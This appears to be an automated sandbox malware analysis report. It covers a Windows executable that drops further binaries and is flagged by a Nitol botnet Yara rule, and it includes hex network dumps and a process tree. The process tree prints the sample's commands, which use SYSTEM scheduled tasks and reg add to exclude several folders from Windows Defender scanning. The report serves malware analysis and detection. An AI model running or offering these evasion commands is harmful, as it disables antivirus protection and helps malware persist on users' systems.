2025-01-11 03:44:26 UTC	4096	IN	Data Raw: 30 df f0 37 2c a5 37 4f 4c e2 13 7c d1 f8 91 c5 fa be cf 9e 00 28 6a dd ff a3 dc ca c7 5f af 65 39 20 43 0f 76 27 75 a7 a8 f1 fa 94 9f e4 b0 f7 a8 82 87 3b 0a 53 b7 20 93 c5 42 21 59 4a 44 cf 6d 00 01 ce a2 49 10 81 c0 c4 c2 ee b6 e5 6b df 46 07 d3 21 07 58 b3 27 fb fe f2 08 3e bc 0d 03 78 9c 6a b4 0f 93 15 14 83 ae 77 c8 e3 dc db 3a e9 9b 9d 1c c6 8a 7b 52 97 8e 19 85 b7 fb c2 a6 6b fd 94 63 78 f1 63 13 10 63 6f 18 d5 92 b6 d1 b7 a2 84 9b d4 90 d9 84 fc ef a5 a6 c5 ba b6 64 c7 fe d4 d4 23 c0 71 8e e4 e7 87 ee e0 7b 41 ab 03 0e d0 58 f4 61 98 ac 8a bc 7f 9b 4c 5a 39 6c 26 9a c8 d3 6c b4 71 fa 5a e7 33 7a 60 25 a6 5a 83 a7 05 e0 89 ab f3 71 7b 1f 34 10 5a c9 8f 29 a8 53 58 fe 56 32 96 b8 9e 3a d9 ee 0c 60 09 71 b5 2b 70 55 a8 b7 e2 8b 6b 95 ad 89 2f ca 6b Data Ascii: 07,7OL\|(j_e9 Cv'u;S B!YJDmIkF!X'>xjw:{Rkcxccod#q{AXaLZ9l&lqZ3z`%Zq{4Z)SXV2:`q+pUk/k
2025-01-11 03:44:26 UTC	4096	IN	Data Raw: 04 8e cb 30 d6 37 73 19 58 f3 d5 05 6a d7 87 a6 a4 b9 8e a3 5d cc d5 8b 34 ca e2 6a a0 78 0e e3 7b 1c 29 5a a6 5b 55 62 f1 e6 be 23 a0 43 ad e5 d7 92 f7 b3 96 4f 03 54 71 e0 f1 af 06 a6 f0 00 d1 7e 0a b5 f4 09 e0 28 9e fb 47 84 32 32 1b 8a 9f c1 2e bc e2 8e a0 2e ff 90 dd 7e c7 83 94 f3 d0 5a 05 5e 0b 2c b3 a4 f8 4a e7 0f 49 f6 3d ff 18 c0 83 1f 5d f8 00 bd db 23 65 28 8b 33 a9 4d 2b 81 26 66 9c dc 18 b6 96 f5 c0 bf 49 34 bb da 49 5e 06 d6 0f 1c e9 ba c4 8c 4c bb 0d 49 a4 6a fd d0 ef 7e 6b 35 34 10 92 02 52 67 16 58 07 e6 47 e0 dc bb dc 14 5e a1 d9 f0 67 70 2c ed fa 8f ca 33 6f ad 4f 2b e0 78 1e f0 18 a4 c5 e4 02 81 a3 0f 9f 0e 1b 45 92 27 fc 39 cc be 57 c0 4c f8 c9 c4 77 47 d4 ac 33 24 78 3d f0 d1 e4 b8 d2 ce 88 69 21 65 3a 2c 1f 95 b1 20 31 6f 2a 06 44 Data Ascii: 07sXj]4jx{)Z[Ub#COTq~(G22..~Z^,JI=]#e(3M+&fI4I^LIj~k54RgXG^gp,3oO+xE'9WLwG3$x=i!e:, 1o*D
2025-01-11 03:44:26 UTC	4096	IN	Data Raw: d0 2a 4c 19 64 3b ba 0e 94 4e 20 15 9f c2 86 3a 4f 85 f3 ee 58 cd 35 91 2f 10 20 88 da 3e c0 05 f8 22 66 79 44 a0 a8 56 48 12 18 4c 26 67 bf 07 bd 0e 8a 4f b7 62 4f 64 7b 46 88 30 02 d0 63 3b 3d 3c 2c 8c 51 e6 c8 ad 43 c5 a4 f1 40 de 99 5c b6 f7 dc 3c 7d 03 cf d9 bc 50 d4 5c 1b dd e0 e1 e2 85 6d a9 c3 e7 80 7d cd 51 5d 8b 19 fb d4 7c 96 d7 f0 1c 7d 23 ef f9 3d bf d8 fd 3e b9 23 40 ea b3 f0 27 06 c6 ea 0b 81 ce 0f cf e6 d6 16 19 12 9a 03 7d 2b 37 16 c5 97 7f 38 15 f7 a1 1d 02 22 4b 1f a3 92 9d c1 35 82 21 2c 90 85 a7 9e 04 28 f5 b1 d9 e8 96 b1 29 17 fc ee 8c bf c7 80 28 0e ea b1 fb 7e 34 d7 f3 21 35 2f 26 43 09 73 42 b5 c9 ae 73 45 1e 38 5f c7 ea 8b e0 a7 ba f0 52 79 4f c7 e5 a4 8b dd 4b 28 03 3d a1 25 9f ac b6 97 e3 25 09 20 15 2d d1 f6 c6 3d 63 88 5a e8 Data Ascii: *Ld;N :OX5/ >"fyDVHL&gObOd{F0c;=<,QC@\<}P\m}Q]\|}#=>#@'}+78"K5!,()(~4!5/&CsBsE8_RyOK(=%% -=cZ

Target ID:	0
Start time:	22:42:59
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\2976587-987347589.08.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\2976587-987347589.08.exe"
Imagebase:	0x140000000
File size:	30'887'936 bytes
MD5 hash:	3F0D4AC83E0BEC29AEBC666FF027A5D6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	22:44:02
Start date:	10/01/2025
Path:	C:\Users\user\Documents\XY3LL0.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Documents\XY3LL0.exe
Imagebase:	0x140000000
File size:	133'136 bytes
MD5 hash:	D3709B25AFD8AC9B63CBD4E1E1D962B9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	22:44:04
Start date:	10/01/2025
Path:	C:\Users\user\Documents\XY3LL0.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Documents\XY3LL0.exe
Imagebase:	0x140000000
File size:	133'136 bytes
MD5 hash:	D3709B25AFD8AC9B63CBD4E1E1D962B9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	22:44:15
Start date:	10/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff7f5dd0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	22:44:15
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	22:44:15
Start date:	10/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
Imagebase:	0x7ff7e8a80000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	22:44:15
Start date:	10/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Run /TN "Task1"
Imagebase:	0x7ff7e8a80000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	22:44:15
Start date:	10/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff7f5dd0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	22:44:15
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	22:44:15
Start date:	10/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff7e8a80000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	22:44:15
Start date:	10/01/2025
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff713fd0000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	22:44:16
Start date:	10/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff7f5dd0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	22:44:16
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	22:44:16
Start date:	10/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
Imagebase:	0x7ff7e8a80000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	22:44:16
Start date:	10/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Run /TN "Task1"
Imagebase:	0x7ff7e8a80000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	22:44:16
Start date:	10/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff7f5dd0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	22:44:16
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	22:44:16
Start date:	10/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff7e8a80000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	22:44:16
Start date:	10/01/2025
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff713fd0000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	22:44:17
Start date:	10/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff7f5dd0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	22:44:17
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	22:44:17
Start date:	10/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
Imagebase:	0x7ff7e8a80000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	22:44:17
Start date:	10/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Run /TN "Task1"
Imagebase:	0x7ff7e8a80000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	22:44:17
Start date:	10/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff7f5dd0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	22:44:17
Start date:	10/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff7e8a80000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	22:44:17
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	22:44:17
Start date:	10/01/2025
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff713fd0000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	22:44:18
Start date:	10/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff7f5dd0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	22:44:18
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	22:44:18
Start date:	10/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"
Imagebase:	0x7ff7e8a80000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	22:44:18
Start date:	10/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Run /TN "Task1"
Imagebase:	0x7ff7e8a80000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	22:44:18
Start date:	10/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff7f5dd0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	22:44:18
Start date:	10/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff7e8a80000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	22:44:19
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	22:44:19
Start date:	10/01/2025
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff713fd0000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	22:45:09
Start date:	10/01/2025
Path:	C:\Program Files (x86)\byHW9q\byHW9q.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\byHW9q\byHW9q.exe"
Imagebase:	0x7d0000
File size:	54'152 bytes
MD5 hash:	7B6586E21FBC8F2F0BB784A1A8FC65B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 0000002A.00000002.3244554396.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 0000002A.00000002.3242107450.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	43
Start time:	22:45:11
Start date:	10/01/2025
Path:	C:\Program Files (x86)\byHW9q\byHW9q.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\byHW9q\byHW9q.exe"
Imagebase:	0x7d0000
File size:	54'152 bytes
MD5 hash:	7B6586E21FBC8F2F0BB784A1A8FC65B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	22:45:12
Start date:	10/01/2025
Path:	C:\Program Files (x86)\x736Pg9\QmbK8U.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\x736Pg9\QmbK8U.exe"
Imagebase:	0x630000
File size:	54'152 bytes
MD5 hash:	7B6586E21FBC8F2F0BB784A1A8FC65B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	22:45:13
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c echo.>c:\xxxx.ini
Imagebase:	0xc50000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	22:45:13
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	22:45:13
Start date:	10/01/2025
Path:	C:\Program Files (x86)\byHW9q\byHW9q.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\byHW9q\byHW9q.exe"
Imagebase:	0x7d0000
File size:	54'152 bytes
MD5 hash:	7B6586E21FBC8F2F0BB784A1A8FC65B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	22:46:01
Start date:	10/01/2025
Path:	C:\Program Files (x86)\x736Pg9\QmbK8U.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\x736Pg9\QmbK8U.exe"
Imagebase:	0x630000
File size:	54'152 bytes
MD5 hash:	7B6586E21FBC8F2F0BB784A1A8FC65B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	22:46:01
Start date:	10/01/2025
Path:	C:\Program Files (x86)\byHW9q\byHW9q.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\byHW9q\byHW9q.exe"
Imagebase:	0x7d0000
File size:	54'152 bytes
MD5 hash:	7B6586E21FBC8F2F0BB784A1A8FC65B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	31.8%
Total number of Nodes:	466
Total number of Limit Nodes:	7

Executed Functions

Function 0000000140006C95 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 260
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@, xrefs: 0000000140006D6C
@, xrefs: 0000000140006FA2

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
Instruction ID: b9b90cad4d4dbad5e60228b5b2812afcd9ff4e9267d7912497f5da913a33a31e
Opcode Fuzzy Hash: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
Instruction Fuzzy Hash: 0EE19876619B84CADBA1CB19E4807AAB7A1F3C8795F105116FB8E87B68DB7CC454CF00

Function 00000001400073E0 Relevance: 1.6, APIs: 1, Instructions: 121
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL ref: 00000001400073E2

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
Instruction ID: 9a2124daaedac402c784edcfb7064d0c1467828d98a6eaf5875e1b487be58861
